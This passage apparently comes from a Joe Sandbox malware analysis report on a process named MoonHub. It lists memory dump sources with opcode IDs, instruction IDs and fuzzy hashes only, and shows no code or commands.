                                                                                                                                                                                • Source File: 00000005.00000002.2991090703.00007FF848E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E90000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_5_2_7ff848e90000_MoonHub.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: b1fd0058a14f3d8920ad97d106b9d199e386afe087a778b7665219c9b16ac5ea
                                                                                                                                                                                • Instruction ID: c9bfd9f24dbb511576063789de701aac006bc9b4ed1f0bfc2ce23333d6f9984b
                                                                                                                                                                                • Opcode Fuzzy Hash: b1fd0058a14f3d8920ad97d106b9d199e386afe087a778b7665219c9b16ac5ea
                                                                                                                                                                                • Instruction Fuzzy Hash: 98510C3190D7994FE761B73468111E97FE0FF427A4F0902BBD09AC70D3DE2A650A8796
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000005.00000002.2991090703.00007FF848E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E90000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_5_2_7ff848e90000_MoonHub.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: 9fa8787bbbe21e0ab93d41d7298573fe1221332f0dcefa6e0f2bb4642619b025
                                                                                                                                                                                • Instruction ID: e956491c5c1deab3533629823a08bdce1a31113c283b27578001045c47724433
                                                                                                                                                                                • Opcode Fuzzy Hash: 9fa8787bbbe21e0ab93d41d7298573fe1221332f0dcefa6e0f2bb4642619b025
                                                                                                                                                                                • Instruction Fuzzy Hash: D951E972A0C6065FEB1CAE1CA8462B977D2FFD5750F04017FF849C3293DE69684246D9
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000005.00000002.2991090703.00007FF848E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E90000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_5_2_7ff848e90000_MoonHub.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: dfd6b09bd5479f979f7b682650e7c1d69a25c289412cb43e5fc71cf029bd131d
                                                                                                                                                                                • Instruction ID: 18725feed6b7a1b72f4d31af047a06edc4195cee0bc2e6b0f8dbf8a00019c5ea
                                                                                                                                                                                • Opcode Fuzzy Hash: dfd6b09bd5479f979f7b682650e7c1d69a25c289412cb43e5fc71cf029bd131d
                                                                                                                                                                                • Instruction Fuzzy Hash: A741B431E0CE4B8FEBA5EA1894455B6B3E6FF94750F040679D44AC3681DF34F80A8B84
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000005.00000002.2991090703.00007FF848E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E90000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_5_2_7ff848e90000_MoonHub.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: c1678211c74b70e7df01255ab1c25aafc7d3e835a61a25395e461324e274ccef
                                                                                                                                                                                • Instruction ID: a7332a2a546693b139b539ad2499abd812886ab7ea96b51522e1c09ec06eaccb
                                                                                                                                                                                • Opcode Fuzzy Hash: c1678211c74b70e7df01255ab1c25aafc7d3e835a61a25395e461324e274ccef
                                                                                                                                                                                • Instruction Fuzzy Hash: 6B413B30708A084FD6A8EB2CD498B6577D1FF59751F1901BAE48EC7266CE30EC45CB85
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000005.00000002.2991090703.00007FF848E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E90000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_5_2_7ff848e90000_MoonHub.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: 41a9b4f666768f6711f9195e5b3895509f241162ce6a67f8ca55d58e16a44fe9
                                                                                                                                                                                • Instruction ID: df5ecc2fab09604790d3f63c9f6296a843552beefada63f471b96e0e57ca9c36
                                                                                                                                                                                • Opcode Fuzzy Hash: 41a9b4f666768f6711f9195e5b3895509f241162ce6a67f8ca55d58e16a44fe9
                                                                                                                                                                                • Instruction Fuzzy Hash: 47516E70908A4E8FDB84EF58C854AEA73F1FF58314F504A69E82AC7295DB74E851CB80
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000005.00000002.2991090703.00007FF848E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E90000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_5_2_7ff848e90000_MoonHub.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: 986b0d85374690cc50ea32a345944ecdd1b36107b05b0479fe1636537f8264f5
                                                                                                                                                                                • Instruction ID: f532bd79a3f015d67ba3e444894d38bf953a60ec5b50c2b65ace767787b224f2
                                                                                                                                                                                • Opcode Fuzzy Hash: 986b0d85374690cc50ea32a345944ecdd1b36107b05b0479fe1636537f8264f5
                                                                                                                                                                                • Instruction Fuzzy Hash: 94412930A1CA099FD748FA2CD455A75B7E2FF99750B1401BDE40DC72A2DF34E8818785
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000005.00000002.2991090703.00007FF848E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E90000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_5_2_7ff848e90000_MoonHub.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: 7b1819ae0c17a70e787f79cb494d655939bc5c40d3b96e87918d43c1c82f8c5b
                                                                                                                                                                                • Instruction ID: 0b06da81a595494d7e1b2b1758ffe6b70b81f1c555bf4d74ff39b8363b632257
                                                                                                                                                                                • Opcode Fuzzy Hash: 7b1819ae0c17a70e787f79cb494d655939bc5c40d3b96e87918d43c1c82f8c5b
                                                                                                                                                                                • Instruction Fuzzy Hash: DA41633171CA054FE7A8E51CA8417B573D2FBD9760F10467EE48EC3682DE36E8464785
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000005.00000002.2991090703.00007FF848E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E90000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_5_2_7ff848e90000_MoonHub.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: a6909d918874af4551ee724691db6bd353eddbb90aad29f3518cf4dc8e604f7c
                                                                                                                                                                                • Instruction ID: 63829720964caa8b9a9bce5ae1fb93c0a6dca443f1f7b6ca6cfcdf22e3982a6e
                                                                                                                                                                                • Opcode Fuzzy Hash: a6909d918874af4551ee724691db6bd353eddbb90aad29f3518cf4dc8e604f7c
                                                                                                                                                                                • Instruction Fuzzy Hash: D341E321B1CA4B4FE758BB3C885567577E1FF55785F1446B9D88EC3286EF28E8028384
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000005.00000002.2991090703.00007FF848E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E90000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_5_2_7ff848e90000_MoonHub.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: 4b83916d851db79dc3f0a931be56c49532ea4ca90c6b37e608f2510829236515
                                                                                                                                                                                • Instruction ID: d5fbda699bf1334ef075813f27e9be47d33039192413296f7ed55cb96066b440
                                                                                                                                                                                • Opcode Fuzzy Hash: 4b83916d851db79dc3f0a931be56c49532ea4ca90c6b37e608f2510829236515
                                                                                                                                                                                • Instruction Fuzzy Hash: F3419F31A0CE964FE7A4E628D084B76B7D1FF54398F084678D08ED3681D77DA885C364
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000005.00000002.2991090703.00007FF848E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E90000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_5_2_7ff848e90000_MoonHub.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: 29d0fa51c2743aa9e41f5ca8408e6fad2893aaf223cf7a21352c679f13c74434
                                                                                                                                                                                • Instruction ID: ed47defe16511dbc92667b12625c8ffb3c228847b27b2650b54abee611c6a9e7
                                                                                                                                                                                • Opcode Fuzzy Hash: 29d0fa51c2743aa9e41f5ca8408e6fad2893aaf223cf7a21352c679f13c74434
                                                                                                                                                                                • Instruction Fuzzy Hash: 7331AD31B1CE550FE75AB56C74851BA7BC0EFC97A0F1401BBD51EC3197DE2558828386
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000005.00000002.2991090703.00007FF848E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E90000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_5_2_7ff848e90000_MoonHub.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: 0972b9ef5c75e4eef3d5996927113a23113ee4daf546f1b22253aefac401b74d
                                                                                                                                                                                • Instruction ID: 972c63bb0114a1f14cc0159b97043d3cd22472b1cf84b6a7654c763752e8e42f
                                                                                                                                                                                • Opcode Fuzzy Hash: 0972b9ef5c75e4eef3d5996927113a23113ee4daf546f1b22253aefac401b74d
                                                                                                                                                                                • Instruction Fuzzy Hash: BD51707090CA8A8FDB8CDF18C861A6537A2FF59348F1406ADD45DC72C2DB7AE812C745
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000005.00000002.2991090703.00007FF848E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E90000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_5_2_7ff848e90000_MoonHub.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: e4b49371d56c34a3efab5650fae9380bcf1088d7c5b81418ff007e5234fa9355
                                                                                                                                                                                • Instruction ID: 8cc1cd90a88c19c7de6ce9ad4f407de57a77f46c0b57acfd72f980f3b914808d
                                                                                                                                                                                • Opcode Fuzzy Hash: e4b49371d56c34a3efab5650fae9380bcf1088d7c5b81418ff007e5234fa9355
                                                                                                                                                                                • Instruction Fuzzy Hash: 7D41F43190D69A5FD742EBB8C8156EA7FF0FF46254F0901FAD089DB1A3CA685C46C790
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000005.00000002.2991090703.00007FF848E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E90000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_5_2_7ff848e90000_MoonHub.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: d1ce79fa3bff6abd5490eb5999f1da11d2bfa5c2db902de5fe56c09ea16c3532
                                                                                                                                                                                • Instruction ID: e1615ca7f0252febfd33b2c6f247e428d987611dc3c0dbc3786445dd8a4f0619
                                                                                                                                                                                • Opcode Fuzzy Hash: d1ce79fa3bff6abd5490eb5999f1da11d2bfa5c2db902de5fe56c09ea16c3532
                                                                                                                                                                                • Instruction Fuzzy Hash: 35410531A0CA074FEA64FA18A4446B973D1FFD43A1F00417AC44EC3692DE39BD8A8A44
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000005.00000002.2991090703.00007FF848E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E90000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_5_2_7ff848e90000_MoonHub.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: d162801e71d62f3a5e9846d1b0577c24c5d1eaf6c45366a883a73944e8f73d65
                                                                                                                                                                                • Instruction ID: 02d3db7014063a1442f8f93c864fc82466458a7c86ce137db3be683b35771a70
                                                                                                                                                                                • Opcode Fuzzy Hash: d162801e71d62f3a5e9846d1b0577c24c5d1eaf6c45366a883a73944e8f73d65
                                                                                                                                                                                • Instruction Fuzzy Hash: 4C411034A18A0ECFDB88FF18C494AAA73E1FF58744F5055A8E41AC7296DB35EC56CB40
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000005.00000002.2991090703.00007FF848E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E90000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_5_2_7ff848e90000_MoonHub.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: b3282d3f10160d95509e1b4fc4ebd4e010cbc309acced908688413cbcd2cbcdb
                                                                                                                                                                                • Instruction ID: 76c2345e3255f8715e63a6f4a3bf4d9d24d8a442cce387482f5f4ab8e4b33204
                                                                                                                                                                                • Opcode Fuzzy Hash: b3282d3f10160d95509e1b4fc4ebd4e010cbc309acced908688413cbcd2cbcdb
                                                                                                                                                                                • Instruction Fuzzy Hash: DE418C3061CB199FDB58FB18C4459B977E1FF99760F1001ADE44A872A2CF38F8428B99
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000005.00000002.2991090703.00007FF848E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E90000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_5_2_7ff848e90000_MoonHub.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: c9ba2bcf1fcde61c3a9c93ab0c6ccf0a016293ea271f9142addd27189edd5232
                                                                                                                                                                                • Instruction ID: 12abbb2757bcf3d9cd753aa6d74ba566017fcd20006707c2ac3dc102ec364d82
                                                                                                                                                                                • Opcode Fuzzy Hash: c9ba2bcf1fcde61c3a9c93ab0c6ccf0a016293ea271f9142addd27189edd5232
                                                                                                                                                                                • Instruction Fuzzy Hash: D0415C3070CA094FDAA8EB2CE498B6537D1FF59750F1900B9E48EC72A2CE70AC45CB85
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000005.00000002.2991090703.00007FF848E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E90000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_5_2_7ff848e90000_MoonHub.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: 03984cde107cc8458293ac20760bf0bf2a3dc522c5ec2d349b538d08c4d04b3d
                                                                                                                                                                                • Instruction ID: 1d41810e14a8cd4b5ecc8611c95ff514ce7e38328536ec83d06c8f545f9daf9d
                                                                                                                                                                                • Opcode Fuzzy Hash: 03984cde107cc8458293ac20760bf0bf2a3dc522c5ec2d349b538d08c4d04b3d
                                                                                                                                                                                • Instruction Fuzzy Hash: E9314200B8B81E2FE44D7AB4F1561BC1087DF94E80F252834E19ED15C7FE2D2D025146
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000005.00000002.2991090703.00007FF848E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E90000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_5_2_7ff848e90000_MoonHub.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: a41c4c5810388f03b14c03e1f60cef22a91752a57ec1cbe1398a61eed3293caa
                                                                                                                                                                                • Instruction ID: 171bb58d89291e55def218d9876d85e63e571f18586a3e1bfd0f63e5b5e59fc5
                                                                                                                                                                                • Opcode Fuzzy Hash: a41c4c5810388f03b14c03e1f60cef22a91752a57ec1cbe1398a61eed3293caa
                                                                                                                                                                                • Instruction Fuzzy Hash: 84411C6248E7C24FD35383B098355927FB0AE93224B0E46EFD4C0CF4A3E1495A4AC363
Memory Dump Source
• Source File: 00000005.00000002.2991090703.00007FF848E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E90000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_7ff848e90000_MoonHub.jbxd
                                                                                                                                                                                • Instruction ID: d40964a9bff703e52260f0b4e2d1b7ad22f4d23e8b56452e878fc0ab1b0688f0
                                                                                                                                                                                • Opcode Fuzzy Hash: 84978416712d3954d70cba82d27b66f61252dff7df198879cef75c93147673c7
                                                                                                                                                                                • Instruction Fuzzy Hash: DB21F236D0DA5E8EF7A4B63498052F977E0FFA5791F040176E81CC3082EF39691A4A85
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000005.00000002.2991090703.00007FF848E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E90000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_5_2_7ff848e90000_MoonHub.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: 8339e7a29958c9b034c2fdf8d614ddf21b262d56f8558204228464cb26ae95bd
                                                                                                                                                                                • Instruction ID: 7036d7d2c58c0365667cef20dbfd894ce259cd04449e5f86dcd2aef36b273b67
                                                                                                                                                                                • Opcode Fuzzy Hash: 8339e7a29958c9b034c2fdf8d614ddf21b262d56f8558204228464cb26ae95bd
                                                                                                                                                                                • Instruction Fuzzy Hash: 6B31E26484E7C69FD396A77848211A9BFE1BF13650F4844FAD089CB0D3EA2C1844C766
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000005.00000002.2991090703.00007FF848E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E90000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_5_2_7ff848e90000_MoonHub.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: 300b8385cf1d857f0bb0260e6c829342a047f4d71dac01537ca66da8a80bdd44
                                                                                                                                                                                • Instruction ID: 8aec1c1f4287a925146f656a0e1480397b9acbbc9cb643be5abd6217863e6f2d
                                                                                                                                                                                • Opcode Fuzzy Hash: 300b8385cf1d857f0bb0260e6c829342a047f4d71dac01537ca66da8a80bdd44
                                                                                                                                                                                • Instruction Fuzzy Hash: 4B317A70A19A0A8FEBC8EF28C8956B977E1FF58750F600179D45EC7291DF38A842C740
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000005.00000002.2991090703.00007FF848E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E90000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_5_2_7ff848e90000_MoonHub.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: a064419ed2be31778061218c4d092d629afe99a7b4b3e3512ff48ec2e3c0f7cf
                                                                                                                                                                                • Instruction ID: 823d0cf020e43d9dc21c74d2518482cec5895fdf413be30d31c785d2867ed9e3
                                                                                                                                                                                • Opcode Fuzzy Hash: a064419ed2be31778061218c4d092d629afe99a7b4b3e3512ff48ec2e3c0f7cf
                                                                                                                                                                                • Instruction Fuzzy Hash: D711D632B1C91A0FF768A51CBC0A6B573D0EB95671F14017BD94DC3297EE26BC4246C9
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000005.00000002.2991090703.00007FF848E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E90000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_5_2_7ff848e90000_MoonHub.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: dc46112dd9efcca848da2a692ce1456b6dbf13a3413e86d9e2408024aa4a854c
                                                                                                                                                                                • Instruction ID: 8efc78b85f6ab820e803dc8905c7f30bd1a347780a633c68a12601aa42369b41
                                                                                                                                                                                • Opcode Fuzzy Hash: dc46112dd9efcca848da2a692ce1456b6dbf13a3413e86d9e2408024aa4a854c
                                                                                                                                                                                • Instruction Fuzzy Hash: FE210421F1CD4F1FE6A8F91C6445B7663C2FB993A0F5405BAD04EC3196DE78A8468348
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000005.00000002.2991090703.00007FF848E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E90000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_5_2_7ff848e90000_MoonHub.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: 06e04bbb73852eb0833e384037718ea51ba4d877f87d3470105849644ae9bb70
                                                                                                                                                                                • Instruction ID: 31b69f0afd7219527859ac35e336110f97f35a95125df0470a8dc4905d12ae8a
                                                                                                                                                                                • Opcode Fuzzy Hash: 06e04bbb73852eb0833e384037718ea51ba4d877f87d3470105849644ae9bb70
                                                                                                                                                                                • Instruction Fuzzy Hash: 3631597290DB915FD306F73CA8A50F47FA0FF91355F0842BBD098CB0A3EA2455158399
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000005.00000002.2991090703.00007FF848E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E90000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_5_2_7ff848e90000_MoonHub.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: c5ff06ea51248d2a4badd6c60b63f24c4b015d04517acd24a2d8eac9aa259c04
                                                                                                                                                                                • Instruction ID: 5c2ff41c75cb7150700032c497504dc92db89aa642a44d08f42860ae57efeccf
                                                                                                                                                                                • Opcode Fuzzy Hash: c5ff06ea51248d2a4badd6c60b63f24c4b015d04517acd24a2d8eac9aa259c04
                                                                                                                                                                                • Instruction Fuzzy Hash: 7021F831A1CA461FE74CA61CA8465BA77D1FB99350F54107EF08FC3297DE39A806874A
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000005.00000002.2991090703.00007FF848E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E90000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_5_2_7ff848e90000_MoonHub.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: 4a6dda2def9119cd025dd1d4d15150b8fec39271da370105ad673816bc1264de
                                                                                                                                                                                • Instruction ID: da869fbea3f4c1d88e427d2cd9e3a2f8ad67967900b1b7aa5df7baf3c524e6a8
                                                                                                                                                                                • Opcode Fuzzy Hash: 4a6dda2def9119cd025dd1d4d15150b8fec39271da370105ad673816bc1264de
                                                                                                                                                                                • Instruction Fuzzy Hash: FB21F231F1CE5A4FE698B6BC541A67977D2EB89698F0401FAE40DC3293DE689C428385
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000005.00000002.2991090703.00007FF848E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E90000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_5_2_7ff848e90000_MoonHub.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: 91a9f6454634d6b1bd810a77c97e6c4cef24a9813e9439d711b3f0225049018c
                                                                                                                                                                                • Instruction ID: e43c8d647736003e651a5ecb17ff1486a2d6b3e24259e643b41fca3efb9858fe
                                                                                                                                                                                • Opcode Fuzzy Hash: 91a9f6454634d6b1bd810a77c97e6c4cef24a9813e9439d711b3f0225049018c
                                                                                                                                                                                • Instruction Fuzzy Hash: 4A21F331B1CA194FD7A8EB2C94587A67BC1FF98354F1401BAD00DCB292DA38E8408785
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000005.00000002.2991090703.00007FF848E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E90000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_5_2_7ff848e90000_MoonHub.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: 4b30d47d2529d6fb1b70cf8994ca44d63d3272af0805dd315301f7a29cae2f11
                                                                                                                                                                                • Instruction ID: a1cb30c9e03bfa47648a851081be6efea46921d992b5c47e1d689a12d5e87164
                                                                                                                                                                                • Opcode Fuzzy Hash: 4b30d47d2529d6fb1b70cf8994ca44d63d3272af0805dd315301f7a29cae2f11
                                                                                                                                                                                • Instruction Fuzzy Hash: 59313A3091D98A9FD788FBA8C455ABABBE1FF09344F4404B9D45AC72A3CF796841C744
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000005.00000002.2991090703.00007FF848E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E90000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_5_2_7ff848e90000_MoonHub.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: e74f04277780507e42d2164d2d03d7a31c4cee8da50313a37b13b2a718acc3c8
                                                                                                                                                                                • Instruction ID: 5fff7ff11293dc1378f90e2cb0f6828b43002168df921ed01f89028bf26247fa
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000005.00000002.2991090703.00007FF848E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E90000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_5_2_7ff848e90000_MoonHub.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: 41f7d73aabcf5930b869abc1e20bc07ecfefdca9807fdffdf9b29641584cf4cd
                                                                                                                                                                                • Instruction ID: 5e9d119829e958991f6937bf361778c1a2cf15df6e2ff75a896c353b79fd7070
                                                                                                                                                                                • Opcode Fuzzy Hash: 41f7d73aabcf5930b869abc1e20bc07ecfefdca9807fdffdf9b29641584cf4cd
